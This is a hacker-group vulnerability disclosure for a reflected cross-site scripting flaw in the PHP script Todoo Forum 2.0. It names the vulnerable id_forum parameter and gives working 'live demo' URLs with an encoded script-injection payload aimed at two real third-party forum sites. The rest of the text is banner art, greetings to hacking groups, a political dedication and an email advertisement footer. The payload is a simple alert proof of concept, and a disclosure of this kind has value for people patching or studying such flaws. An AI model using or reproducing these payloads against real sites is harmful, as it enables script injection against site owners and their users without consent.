============================================================================== _ _ _ _ _ _ / \ | | | | / \ | | | | / _ \ | | | | / _ \ | |_| | / ___ \ | |___ | |___ / ___ \ | _ | IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| ============================================================================== [?] ~ Note : [ Tribute to the martyrs of Gaza . ] ============================================================================== [?] Todoo Forum 2.0 [xss] Cross Site Scripting Vulnerability ============================================================================== [?] Script: [ Todoo Forum ] [?] Language: [ PHP ] [?] Site page: [ Todooforum est un forum entirement personnalisable et intgrable ] [?] Download: [ http://www.todoomasters.com/scripts/todooforum.zip ] [?] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ] [?] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ] [?] My Home: [ HackTeach.Org , Islam-Attack.Com ] ########################################################################### ===[ Exploit ]=== [?] http://[target].com/[path]/todooforum.php?cat=post&id_forum=[Xss Vuln] ===[ Live Demo ]=== [?] http://membres.multimania.fr/ps2foreverall/forum/forum.php?cat=post&id_forum=%22%3E%3Cscript%3Ealert(1);%3C/script%3E [?] http://aslg.aslpaintball.fr/forum/forum.php?cat=post&id_forum=%22%3E%3Cscript%3Ealert(1);%3C/script%3E Author: ViRuSMaN <- ########################################################################### ________________________________ Windows Live: Keep your friends up to date with what you do online.<http://www.microsoft.com/middleeast/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:en-xm:SI_SB_1:092010>